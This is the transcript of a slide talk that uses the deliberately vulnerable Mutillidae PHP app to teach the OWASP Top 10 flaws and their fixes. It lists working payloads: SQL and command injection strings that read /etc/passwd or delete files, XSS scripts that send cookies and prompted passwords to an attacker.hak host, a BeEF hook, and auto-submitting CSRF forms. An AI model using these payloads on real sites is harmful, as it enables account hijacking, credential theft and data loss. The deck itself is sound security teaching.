Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts

Download Report

Transcript Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts

Adrian Crenshaw
http://Irongeek.com





I run Irongeek.com
I have an interest in InfoSec
education
I don’t know everything - I’m just a
geek with time on my hands
I’m also not a professional web
developer, creating crappy code
was easy for me. 
So why listen to me? Sometimes it
takes a noob to teach a noob.
http://Irongeek.com




OWASP Top 10
http://www.owasp.org/index.php/OWASP_Top_Ten_Project
As a side note, I’ve copied (Ligatted) quite of few of their
descriptions and fixes into this presentation
Mutillidae
http://www.irongeek.com/i.php?page=security/mutillidaedeliberately-vulnerable-php-owasp-top-10
Samurai WTF
http://samurai.inguardians.com/
Ok, but what are those?
http://Irongeek.com
The OWASP Top Ten represents a broad consensus about what the most critical
web application security flaws are.
The 2010 list includes:

A1: Injection

A2: Cross-Site Scripting (XSS)

A3: Broken Authentication and Session Management

A4: Insecure Direct Object References

A5: Cross-Site Request Forgery (CSRF)

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer Protection

A10: Unvalidated Redirects and Forwards
http://Irongeek.com






A teaching tool for illustrating the OWASP 10
Written in PHP/MySQL
Meant to be simpler than WebGoat
Simple to exploit, just to get the concept across
Easy to reset
Includes a “Tips” function to help the student
http://Irongeek.com



Live CD meant to be a “Web Testing Framework”
Made by some guys at Inguardians
Kevin Johnson
Justin Searle
Frank DiMaggio
If you want a more general network pentesting
distro, look at Backtrack 4
http://www.backtrack-linux.org/
http://Irongeek.com
1.
2.
3.
4.
5.
Download Mutillidae
http://www.irongeek.com/i.php?page=security/mutillidaedeliberately-vulnerable-php-owasp-top-10
Grab XAMPP Lite and install it
http://www.apachefriends.org/en/xampp.html
Put the Mutillidae files into a web accessible directory (
\htdocs on XAMPP)
May want to edit mutillidae/.htaccess to decide who can
access it
Put your MySQL config information into
mutillidae/config.inc
http://Irongeek.com

Lovely set of libraries to help implement fixes like
proper escaping, parameterization and such.
http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

Supported platforms:
Java 1.4.4
Java 2.0
.NET
Classic ASP
PHP
ColdFusion & CFML
Python
Javascript
http://Irongeek.com
Injection flaws, particularly SQL
injection, are common in web applications.
Injection occurs when user-supplied data is
sent to an interpreter as part of a command
or query. The attacker's hostile data tricks
the interpreter into executing unintended
commands or changing data.
http://Irongeek.com
The Code:
“SELECT * FROM accounts WHERE username='". $username ."' AND
password='".stripslashes($password).”’”
or
echo shell_exec("nslookup " . $targethost);'“
Expected to fill in the string to:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’
or
Nslookup irongeek.com
But what if the person injected:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’
or
Nslookup irongeek.com && del *.*
http://Irongeek.com

Simple SQL Injection:
' or 1=1 --

Wish I could do this, but can't stack in MySQL/PHP
'; DROP TABLE owasp10; --

Command Injections (for Windows):
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak

Command Injections (for *nix):
;ls
;whoami
;cat /etc/passwd
;nmap –A target.hak
http://Irongeek.com

SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

SQL Injection Attacks by Example
http://unixwiz.net/techtips/sql-injection.html

Command line Kung Fu
http://blog.commandlinekungfu.com/
http://Irongeek.com








Input validation.
Use strongly typed parameterized query APIs
(bound parameters).
Enforce least privilege.
Avoid detailed error messages.
Show care when using stored procedures.
Do not use dynamic query interfaces.
Do not use simple escaping functions.
Watch out for canonicalization errors.
http://Irongeek.com
XSS flaws occur whenever an
application takes user supplied data and
sends it to a web browser without first
validating or encoding that content. XSS
allows attackers to execute script in the
victim's browser which can hijack user
sessions, deface web sites, possibly
introduce worms, etc.
http://Irongeek.com

Simple:
<script>alert("XSS");</script>

Page Redirect:
<script>window.location =
"http://www.irongeek.com/"</script>

Cookie Stealing:
<script>
new
Image().src="http://attacker.hak/mutillidae/catch.php?cooki
e="+encodeURI(document.cookie);
</script>
http://Irongeek.com

Simple:
<script>alert("XSS");</script>

Page Redirect:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script>
new Image().src="http://attacker.hak/mutillidae/ccatch.php?cookie="+encodeURI(document.cookie);
</script>

Password Con:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img
src=\"http://attacker.hak/mutillidae/catch.php?username="+username+"&password="+password+"\">
");
</script>
http://Irongeek.com

External Javascript:
<script src="http://ha.ckers.org/xss.js">
</script>

Hot BeEF Injection:
<script language='Javascript'
src='http://attacker.hak/beef/hook/beefmagic.js.php'></script>

How about the User Agent string?
http://Irongeek.com

Mangle XSS to bypass filters:
http://ha.ckers.org/xss.html

BeEF browser exploitation framework
http://www.bindshell.net/tools/beef

XSS Me Firefox plugin
https://addons.mozilla.org/en-US/firefox/addon/7598

Exotic Injection Vectors
http://www.irongeek.com/i.php?page=security/xss-sql-andcommand-inject-vectors
http://Irongeek.com





Input validation.
Strong output encoding. htmlspecialchars()
Specify the output encoding.
Do not use "blacklist" validation to detect XSS in
input or to encode output.
Watch out for canonicalization errors.
http://Irongeek.com
Account credentials and session
tokens are often not properly protected.
Attackers compromise passwords, keys, or
authentication tokens to assume other
users' identities.
http://Irongeek.com


This can be very application specific
For Mutillidae: Let’s Edit A Cookie!
http://Irongeek.com

Edit Cookies Plugin
https://addons.mozilla.org/en-US/firefox/addon/4510

Tamper Data Firefox Plugin
https://addons.mozilla.org/en-US/firefox/addon/966
http://Irongeek.com








The primary assets to protect are credentials and session IDs.
1. Are credentials always protected when stored using hashing or
encryption? See A7.
2. Can credentials be guessed or overwritten through weak account
management functions (e.g., account creation, change password,
recover password, weak session IDs)?
3. Are session IDs exposed in the URL (e.g., URL rewriting)?
4. Are session IDs vulnerable to session fixation attacks?
5. Do session IDs timeout and can users log out?
6. Are session IDs rotated after successful login?
7. Are passwords, session IDs, and other credentials sent only over TLS
connections?
http://Irongeek.com
The primary recommendation for an organization is to make available to
developers:
1. A single set of strong authentication and session management
controls. Such controls should strive to:
a) meet all the authentication and session management
requirements defined in OWASP’s Application Security Verification
Standard(ASVS) areas V2 (Authentication) and V3 (Session
Management).
b) have a simple interface for developers. Consider the ESAPI
Authenticator and User APIsas good examples to emulate, use, or
build upon.
2. Strong efforts should also be made to avoid XSS flaws which can be
used to steal session IDs.
http://Irongeek.com
A direct object reference occurs when
a developer exposes a reference to an
internal implementation object, such as a
file, directory, database record, or key, as a
URL or form parameter. Attackers can
manipulate those references to access
other objects without authorization.
http://Irongeek.com

In the old version, you would have already seen it
with the malicious file include demo. This time, let
got look at the:
Source viewer
and in case you think POST will save you
Text file viewer
http://Irongeek.com

Avoid exposing your private object references to
users whenever possible, such as primary keys or
filenames.

Validate any private object references extensively
with an "accept known good" approach.

Verify authorization to all referenced objects.
http://Irongeek.com
A CSRF attack forces a logged-on
victim's browser to send a pre-authenticated
request to a vulnerable web application,
which then forces the victim's browser to
perform a hostile action to the benefit of the
attacker. CSRF can be as powerful as the
web application that it attacks.
http://Irongeek.com
1. Session established
with web app via a
cookie. (already logged
in)
Target Web App
2. At some later point,
content that the
attacker controls is
requested.
3. Attacker serves up
content that asks
client’s browser to
make a request.
4. Client makes request,
and since it already has
a session cookie the
request is honored.
http://Irongeek.com
Client
Website the
attacker controls

Let’s visit a page with this lovely link:
<img src="http://target.hak/mutillidae/index.php?page=add-to-yourblog.php&input_from_form=hi%20there%20monkeyboy">

Don’t want to use a bad image? Try an iframe:
<iframe src="http://target.hak/mutillidae/index.php?page=add-to-yourblog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px;
height:0px; border: 0px"></iframe>

Can’t use the GET method? Try something like:
<html> <body>
<form name="csrfform" method="post"
action="http://target.hak/mutillidae/index.php?page=add-to-your-blog.php">
<input type='hidden' name='input_from_form'
value="Test of an auto submitted form.">
</form>
<script>document.csrfform.submit()</script>
</body></html>
http://Irongeek.com

CSRF Flaws Found On Major Websites, Including a
Bank
http://it.slashdot.org/article.pl?sid=08/09/30/0136219

CSRF Home Router Fun
http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-gadsl-gateway-with-speedbooster-wag54gs/

CSRF in Gmail
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
http://Irongeek.com

For sensitive data or value transactions, re-authenticate or
use transaction signing to ensure that the request is
genuine.

Do not use GET requests (URLs) for sensitive data or to
perform value transactions. (see next point)


POST alone is insufficient protection.
Consider adding Captchas and extra sessions values as
hidden form elements.
http://Irongeek.com

Deliberately Insecure Web Applications For
Learning Web App Security
http://www.irongeek.com/i.php?page=security/deli
berately-insecure-web-applications-for-learningweb-app-security
http://Irongeek.com

SamuraiWTF
http://samurai.inguardians.com/

OWASP Live CD
http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

BackTrack
http://www.remote-exploit.org/backtrack.html

ESAPI (OWASP Enterprise Security API)
http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
http://Irongeek.com




Free ISSA classes
ISSA Meeting
http://issa-kentuckiana.org/
Louisville Infosec
http://www.louisvilleinfosec.com/
Phreaknic/Notacon/Outerz0ne
http://phreaknic.info
http://notacon.org/
http://www.outerz0ne.org/
http://Irongeek.com
42
http://Irongeek.com